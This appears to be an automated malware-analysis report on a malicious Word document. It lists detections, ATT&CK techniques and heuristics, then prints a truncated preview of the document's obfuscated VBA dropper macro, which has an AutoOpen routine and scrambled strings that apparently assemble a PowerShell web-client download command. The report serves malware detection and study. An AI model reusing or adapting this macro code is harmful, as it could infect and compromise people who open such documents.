Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Autoopen' macro and 'Shell()' call indicate an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6547437-0' strongly suggests this is a dropper for further malicious payloads. No specific family could be identified from the available heuristics or script content.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6547437-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6547437-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 161580 bytes |

SHA-256 (macros.bas): cb3ff780a64552ee521b5ae16e85980e711df7f9c7e29db6974f374e8ea833aa

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "wAkVjjEGu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BOLmzX(hKlWoC)
rvnYh = LUqCjF
irwwAz = (DZirr / MqrHIk / 97038 / Fix(KWqNkS)) + 57005 - CLng(XJGsoN + CLng(81219)) + pVqCI + 34652 * vhpkU - CStr(55047) / uwGkTU / CLng(jQiWW)
End Sub
Sub ZlwEw(fRmtw)
sKufvi = EoPKl
tVEFF = (flQnK / klTzRH / 4937 / Fix(uaKME)) + 40893 - CLng(NSNKbM + CLng(99845)) + fbLhh + 32493 * cWkwK - CStr(95572) / HXHHbK / CLng(KrBjP)
TDdjW = joVFaU
pwocHK = (YLqCTl / lUjKzS / 98215 / Fix(YtAZZR)) + 1336 - CLng(RhmhUU + CLng(42937)) + tZRtI + 25858 * PlvuTm - CStr(91159) / CuFaub / CLng(lhXZYV)
DVRwVQ = AFcLS
oiWhzW = (knPub / LnkVio / 9902 / Fix(hadVRf)) + 8195 - CLng(ocOcr + CLng(88226)) + KqaCR + 93247 * FXXiE - CStr(70442) / ktWNB / CLng(EsMiq)
End Sub
Sub iwmfz(RhZiIm)
mRUGzi = TmEisO
nCRisL = (ORTrY / mDpFlj / 48842 / Fix(ojmOz)) + 30436 - CLng(vtDmkG + CLng(58503)) + IAPbXY + 1025 * OZwoQ - CStr(93023) / zJpawS / CLng(QtvkSX)
FnjIZ = EWICqn
YoDbQz = (GdujfL / kWfmGd / 73463 / Fix(lPjrO)) + 89565 - CLng(AnjLkG + CLng(53239)) + UTScIb + 86959 * cNEUz - CStr(55415) / kKwPC / CLng(uZkzfd)
End Sub
Sub Autoopen()
On Error Resume Next
wUbWI = LSnAdh
PDdKZb = (XwAor / CZuhc / 56037 / Fix(lDIlhM)) + 36179 - CLng(wzKSh + CLng(19583)) + qvaaE + 10236 * zUnfji - CStr(72101) / FXAjG / CLng(vscNI)
KLMRrDCMuHViZE (aBpVJ + pUfYmIXpT + diwHC)
sBFnw = cojYr
SzDMuD = (MvzIwi / VUBCZ / 96550 / Fix(bqEFH)) + 87756 - CLng(kUaCJC + CLng(6244)) + LQovJ + 81305 * ttJJjj - CStr(15253) / dwtSqH / CLng(HmJWba)
End Sub
Sub GmcOJ(kOioi)
wLwwNu = hwDQjM
MJBlm = (DUmWj / WwCPU / 9851 / Fix(tKmLow)) + 54811 - CLng(tcCWtC + CLng(9252)) + aNtBPu + 54427 * ZSvXi - CStr(58909) / jKuSua / CLng(MoKQJr)
znPRCc = bDYwh
lVBEU = (vTLwj / WcAEr / 99175 / Fix(koZifF)) + 54404 - CLng(fHHWU + CLng(24515)) + MrmFv + 90436 * RopjHj - CStr(98699) / WMZOz / CLng(MqVzr)
PLEcP = JQJRlD
nWlpzz = (DiluwF / mAARG / 7453 / Fix(jGjMQK)) + 43204 - CLng(sEbVYJ + CLng(5218)) + BWBvIl + 50460 * fJiWQ - CStr(17130) / fzGHQ / CLng(cjnZU)
End Sub
Sub jTbhFk(zvEIa)
fahHcz = jDvVR
lZYmN = (oztqE / cmqJFa / 84080 / Fix(LlbvbL)) + 49984 - CLng(DcXFQ + CLng(5816)) + AaIqml + 92199 * jcfzNc - CStr(48924) / VdkqAz / CLng(LCvnwR)
End Sub
Attribute VB_Name = "zLZoqizjF"
Sub PzrSwL(ZdiCb)
MzCzwo = wzURdU
ZlqAl = (qaBGK / qjNSn / 31333 / Fix(jNqok)) + 1541 - CLng(PwQiZo + CLng(53920)) + nnndQC + 79203 * vvnhzH - CStr(70773) / hBGnMi / CLng(FzqJuK)
End Sub
Function pUfYmIXpT()
On Error Resume Next
jVnFv = fJzUqb
szTwIL = (zYioZF / hiatvb / 47554 / Fix(SurLK)) + 2517 - CLng(Blwln + CLng(8241)) + jrBib + 49636 * mwjqj - CStr(96467) / ZavAWd / CLng(YGwAiZ)
zTTsNk = ZBWEC
RONLKF = (IXLTHo / njtTR / 20189 / Fix(FWaCX)) + 45148 - CLng(oqMOXZ + CLng(2606)) + zqlJEc + 50167 * zkZiZ - CStr(81489) / CnsUL / CLng(mImiIT)
QrhCj = jCrqS("I6E]raHC[]gnIrTS[,PH42yJPH4(EcAlPeR.)'+'43]raHC[]gn'+'IrTS[,)901]raHC[+311]raHC[+78]raHC[((EcAlPeR.)PH4'+'xdDPH4,PH4XJ5PH4(E'+'cAlPeR.)63]raHC[]'+'gnIrTS[,)45]raHC[+27]raHC[+801]raHC[((EcAlPeR.)PH4jpTbs", 50966 + 6 - 50966, 50966 + 194 - 50966)
wEkPEq = ChHGlf
aSwsG = (iJafFp / Khzbv / 16483 / Fix(JvAKZi)) + 8597 - CLng(Vjmjj + CLng(57005)) + qopCV + 98854 * iFJPlb - CStr(41550) / fKcmFf / CLng(oTXtc)
EOHJQ = nQCLMD
dzrvY = (HIOMcD / XQjobD / 78549 / Fix(onmHz)) + 33097 - CLng(DOzDK + CLng(97831)) + XonoQi + 88013 * CfGkcW - CStr(63763) / jJPzo / CLng(EnYXs)
kNMzhQFJQZo = jCrqS("fQcaMPH42PH4+PH482PH4+PH4 ,00001(tPH4+PH4xen.dsaPH4'+'+PH4daPH4+PH4sn6Hl ='+' BSN6Hl;tnePH4+PH4ilCbeW.t'+'PH4+PH4eN.metPH4+PH4sPH4+PH4yS )2yJPH4+PH4tcejboPH4+PH4-2yJ'+'+2yPH4+PH4IA5", 78543 + 4 - 78543, 78543 + 173 - 78543)
zMYsj = tuAnnK
wlHBO = (sWAPuv / FNjAP / 85263 / Fix(oqpGNE)) + 96787 - CLng(mNvVEc + CLng(80278)) + zlKiz + 66907 * wdziYf - CStr(20083) / YvYfH / CLng(AnKqOj)
aEpvX = ZaZPa
snjGw = (bijVNT / SlnzPR / 99580 / Fix(
... (truncated)